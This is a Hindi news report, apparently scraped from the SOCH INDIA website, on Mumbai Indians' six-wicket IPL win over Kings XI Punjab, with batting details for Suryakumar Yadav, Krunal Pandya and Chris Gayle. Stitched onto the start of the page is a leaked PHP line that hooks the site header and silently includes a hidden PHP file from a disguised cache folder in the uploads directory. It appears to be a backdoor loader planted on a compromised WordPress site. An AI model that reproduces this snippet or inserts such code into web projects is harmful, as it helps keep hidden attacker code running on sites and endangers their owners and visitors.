add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); आखिरकार मुंबई को मिली जीत, पंजाब को हराकर प्लेऑफ की उम्मीदों को रखा जिंदा – SOCH INDIA
Menu

आखिरकार मुंबई को मिली जीत, पंजाब को हराकर प्लेऑफ की उम्मीदों को रखा जिंदा

nobanner

आईपीएल 11 के 34वें मैच में मुंबई इंडियंस ने 6 विकेट से किंग्स इलेवन पंजाब पर शानदार जीत दर्ज करते हुए अपने प्लेऑफ में जाने की उम्मीदों को जिंदा रखा है. बीती रात मिली जीत के साथ मुंबई इंडियंस प्वाइंट्स टेबल में पांचवे स्थान पर पहुंच गई है. मुंबई इंडियंस ने ने टॉस जीतकर पहले गेंदबाजी करने का फैसला किया था.

पहले बल्लेबाजी का न्योता मिलने पर पंजाब ने क्रिस गेल (50) के आईपीएल में 25वें अर्धशतक के दम पर निर्धारित 20 ओवरों में छह विकेट होकर 174 रन बनाए थे. मुंबई ने इस लक्ष्य को एक ओवर पहले ही चार विकेट खोकर हासिल कर लिया.

मुंबई की जीत के हीरो सलामी बल्लेबाज सूर्य कुमार यादव (57) और क्रुणाल पांड्या रहे. मुंबई जब संकट में थी तब पांड्या ने महज 12 गेंदों में चार चौके और दो छक्कों की मदद से नाबाद 31 रन बनाते हुए टीम को जीत दिलाई. इसमें कप्तान रोहित शर्मा ने उनका बखूबी साथ दिया. कप्तान ने 15 गेंदों पर दो छक्के और एक चौका मार उपयोगी 24 रन बनाए और टीम को जीत दिला कर नाबाद पवेलियन लौटे.

रोहित और क्रुणाल की पार्टनरशिप ने दिलाई जीत

175 रनों के लक्ष्य का पीछा करने उतरी मुंबई को अच्छी शुरुआत की जरुरत थी. सूर्यकुमार इस आईपीएल में फॉर्म में हैं और उन्होंने इस मैच में भी बल्ले से बेहतरीन पारी खेलते हुए 42 गेंदों में छह चौके और तीन छक्कों की मदद से अर्धशतकीय पारी खेली. लेकिन उनके सलामी जोड़ीदार इविन लुइस 10 रनों के निजी स्कोर पर मुजीब उर रहमान की गेंद पर पवेलियन लौट लिए. मुंबई का पहला विकेट छठे ओवर की दूसरी गेंद पर 38 के कुल स्कोर पर गिरा. अर्धशतक पूरा करने के कुछ देर बाद सूर्यकुमार भी मार्कस स्टोइनिस का शिकार हो गए. सूर्यकुमार का विकेट 80 के कुल स्कोर पर गिरा.

कप्तान रोहित और क्रुणाल ने मोर्चा संभाला और ताबड़तोड़ तरीके से चौके और छक्कों की बारिश शुरू कर दी. दोनों ने महज 21 गेंदों में पांचवें विकेट के लिए 56 रनों की साझेदारी कर टीम को सीजन की तीसरी जीत दिलाई.

पंजाब को मिली थी तेज शुरुआत

इससे पहले गेल उस अंदाज में नहीं दिखे जो इस मैच से पहले उन्होंने दिखाया था. गेल ने अपनी पारी के दौरान 40 गेंदों का सामना किया और दो छक्के व चार चौके लगाए. उम्मीद के मुताबिक पंजाब को अच्छी शुरुआत मिली. गेल और लोकेश राहुल की जोड़ी ने पहले विकेट के लिए 6.4 ओवरों में 54 रन जोड़े. हालांकि इस सलामी जोड़ी ने स्वभाव के विपरित थोड़ी धीमी गति से रन जोड़े.

मिशेल मैक्लेघन, जसप्रीत बुमराह और हार्दिक के विफल होने के बाद रोहित ने लेग स्पिनर मयंक मारकंडे को गेंद दी. राहुल, मयंक की एक गुगली को डीप मिडविकेट पर खड़े ज्यां पॉल ड्यूमिनी के हाथों में खेल बैठे. राहुल ने 20 गेंदों में एक चौके और दो छक्कों की मदद से 20 रन बनाए.

गेल ने बेन कटिंग के फेंके गए 12वें ओवर की पहली गेंद पर एक रन लेकर आईपीएल में अपना 25वां अर्धशतक पूरा किया, लेकिन तीन गेंद पर बाद वह कटिंग की गेंद पर छक्का मारने के प्रयास में सूर्यकुमार को कैच दे बैठे.

युवराज सिंह ने का खराब फॉर्म इस मैच में भी जारी रहा और वह 14 गेंदों में 14 रन बनाकर आउट हो गए. वह 96 रनों के कुल स्कोर पर रन आउट होकर पवेलियन लौटे. करुण नायर अच्छी बल्लेबाजी कर रहे थे. उन्होंने दो शानदार छक्के भी जड़े. अंत में मार्कस स्टोइनिस ने 15 गेंदों में दो चौके और दो छक्कों की मदद से 29 रनों की पारी खेलकर टीम को 174 के कुल स्कोर तक पहुंचाया.

Leave a Comment

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>